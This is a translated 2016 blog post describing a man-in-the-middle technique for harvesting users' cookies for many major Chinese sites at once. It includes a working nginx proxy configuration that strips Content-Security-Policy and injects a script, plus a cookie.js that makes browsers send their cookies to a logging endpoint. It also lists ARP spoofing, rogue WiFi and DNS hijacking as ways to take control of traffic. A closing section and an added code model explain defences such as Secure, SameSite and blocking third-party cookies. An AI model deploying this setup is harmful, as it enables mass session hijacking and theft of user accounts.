EtherDream · 2016/02/01

0x00 Preface

Sharing a small man-in-the-middle trick that works every time.

This was originally an old article, but it was written far too wordily. Let's go over it again today in plain terms.

0x01 Principle

Traditional cookie sniffing can only capture cookies for the sites the user actively visits. Sites the user never opens are never captured, so it is very inefficient.

If we control the traffic, we can inject a script into the page the user is visiting. With a script, we can make the browser request any site:

```js
new Image().src = 'http://anyhost'
```

Because the browser attaches the matching cookies to the request headers, this makes the user's browser send its cookies for any site we choose through the middleman.

0x02 Mass harvesting

First collect the domain names of the major websites, then request them one by one:

```js
var list = ['qq.com', '163.com', 'weibo.com', ...];

for (var i of list) {
    new Image().src = 'http://' + i + '/__cookie';
}
```

In this way, the user's cookies for every one of these websites are handed over.

The back end receives the /__cookie request, logs the Cookie header it carries, and returns an empty response. Each site can thus be probed with minimal traffic.

0x03 Optimization

Because so many different sites are collected, a large number of DNS lookups are needed.

To make the harvesting faster, we can hijack the user's DNS requests and temporarily resolve every domain to our OWN IP, so that no name query ever has to leave for the Internet.

```text
        DNS
User <-------> Middleman
        HTTP      |
                  +-------> Extranet (HTTP only, when available)
```

This also brings a huge advantage: the whole system no longer depends on the external network, so the hijacking works offline!

For example, in a place with no Internet access at all, a rogue WiFi hotspot can still be used to attack.

0x04 Demo

Let’s use nginx to demonstrate:

```nginx
# nginx.conf
http {
    resolver 114.114.114.114;
    ...
    log_format record_cookie '$time_iso8601 $remote_addr $http_host $http_cookie';

    # the middleman's own site: serves the injected script
    server {
        listen 8080;
        server_name m.io;
        gzip on;
        #expires 1d;
        root /path/to/;
    }

    # proxy
    server {
        listen 8080 default_server;
        server_name _;
        gzip on;

        # pages go through injection
        if ($http_accept ~ "text/html") {
            rewrite ^ /__html;
        }

        # other resources, normal proxy
        location / {
            proxy_pass http://$http_host;
        }

        # page injection
        location = /__html {
            internal;
            proxy_set_header Host $http_host;
            proxy_pass http://127.0.0.1:50000$request_uri;
            proxy_hide_header Content-Security-Policy;
            sub_filter "<head" "<script src=//m.io/cookie.js></script><head";
        }

        # record cookie
        location = /__cookie {
            access_log /path/to/cookie.log record_cookie;
            add_header Cache-Control "max-age=3600";
            return 200;
        }
    }

    # decompression hop: sub_filter needs an uncompressed body
    server {
        listen 127.0.0.1:50000;
        gunzip on;
        location / {
            proxy_set_header Accept-Encoding deflate;
            proxy_pass http://$host;
        }
    }
}
```

In the /path/to directory, place the front-end attack script:

```js
// cookie.js
(function(list) {
    // only run in the top-level window, not in every iframe
    if (self != top) return;

    list = list.split(' ');

    for (var i = 0; i < list.length; i++) {
        new Image().src = 'http://' + list[i] + '/__cookie';
    }
})(
    // target site list
    '163.com qq.com weibo.com'
);
```

To try it out, set the browser's HTTP proxy to 127.0.0.1:8080.

Open any HTTP page, and the user's cookies for every site in the list show up in cookie.log.

There are many ways to take control of the traffic: ARP spoofing, a phishing WiFi hotspot, a phishing proxy, hijacking a community PPPoE network, and so on.

0x05 Countermeasures

In fact, just as with JSONP privacy leaks, disabling third-party cookies in the browser is enough: the injected image requests are cross-site, so the browser stops attaching the target sites' cookies to them.

Third-party cookies are the culprit behind this kind of privacy leak. Two points are worth checking as a site owner as well: a cookie marked Secure is never sent over plain http://, so this trick cannot harvest it, and the SameSite cookie attribute (introduced after this article was written) keeps the browser from attaching a cookie to cross-site requests like these.
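To make the countermeasures concrete, here is an added example (not from the original post) that models, in simplified form, the rules a browser applies before attaching cookies to one of the injected `http://<site>/__cookie` image requests: domain matching, the Secure flag, the SameSite attribute, and the "block third-party cookies" setting. It is a model for reasoning, not a real cookie jar; the registrable-domain check is approximated by the last two labels, and the jar and its values are invented.

```javascript
'use strict';
// Added example, not from the original post: a simplified model of the cookie rules a
// browser applies to the injected `new Image().src = 'http://<site>/__cookie'` requests.
// It covers domain matching (RFC 6265 section 5.1.3), the Secure flag, the SameSite attribute
// and a "block third-party cookies" setting; the jar below is made up.

// Approximate a site's registrable domain by its last two labels (assumption: a real
// browser consults the Public Suffix List, so co.uk-style suffixes are not handled here).
function site(host) {
  return host.split('.').slice(-2).join('.');
}

// Host-only cookies match only the exact host; domain cookies match the domain and its subdomains.
function domainMatches(host, cookie) {
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// Names of the cookies attached to a subresource request for `url`, issued by a page on
// `pageHost`. `opts.blockThirdParty` models the browser setting the article recommends.
function cookiesAttached(jar, url, pageHost, opts = {}) {
  const u = new URL(url);
  const crossSite = site(u.hostname) !== site(pageHost);
  return jar.filter((c) => {
    if (!domainMatches(u.hostname, c)) return false;
    if (c.secure && u.protocol !== 'https:') return false;   // Secure: https only
    if (crossSite) {
      if (opts.blockThirdParty) return false;                 // third-party cookies disabled
      if (c.sameSite === 'Strict' || c.sameSite === 'Lax') return false; // an <img> load is not a top-level navigation
    }
    return true;
  }).map((c) => c.name);
}

// Constructed cookie jar (names and attributes invented).
const JAR = [
  { name: 'uin',       domain: 'qq.com',      hostOnly: false },                   // plain cookie: leaks
  { name: 'skey',      domain: 'qq.com',      hostOnly: false, secure: true },     // Secure: never on http://
  { name: 'SUB',       domain: 'weibo.com',   hostOnly: false, sameSite: 'Lax' },  // SameSite: not on a cross-site <img>
  { name: 'NTES_SESS', domain: 'www.163.com', hostOnly: true },                    // host-only: 163.com/__cookie misses it
];

// What the script from the article collects, for each site in its list.
function harvest(jar, sites, pageHost, opts) {
  const out = {};
  for (const s of sites) out[s] = cookiesAttached(jar, 'http://' + s + '/__cookie', pageHost, opts);
  return out;
}

module.exports = { site, domainMatches, cookiesAttached, harvest, JAR };
```

Run against the jar from a page on news.example.com, `harvest` returns only `uin` for qq.com: the Secure cookie is withheld on http://, the Lax cookie is withheld on a cross-site image load, and the host-only 163.com cookie is missed entirely because the script asks 163.com rather than www.163.com. With `{ blockThirdParty: true }` nothing is returned at all, which is the article's recommended fix seen from the browser's side.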